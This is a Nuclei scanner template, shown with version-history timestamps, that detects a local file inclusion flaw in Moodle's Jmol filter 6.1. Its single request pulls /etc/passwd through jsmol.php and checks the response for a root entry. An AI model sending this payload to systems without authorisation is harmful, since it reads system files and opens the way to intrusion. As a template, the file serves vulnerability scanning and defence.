nuclei-templates/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml

31 lines
758 B
YAML
Raw Normal View History

id: moodle-filter-jmol-lfi
2020-05-24 22:19:21 +00:00
info:
name: Moodle Jmol Filter 6.1 - Local File Inclusion
author: madrobot
severity: high
description: Moodle is vulnerable to local file inclusion.
reference:
- https://www.exploit-db.com/exploits/46881
classification:
2023-03-03 16:50:58 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:F/RL:W/RC:C
cvss-score: 7.5
cwe-id: CWE-22
tags: moodle,lfi,edb
requests:
- method: GET
path:
- "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
2020-05-24 22:19:21 +00:00
- 200
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
part: body
# Enhanced by mp on 2022/07/22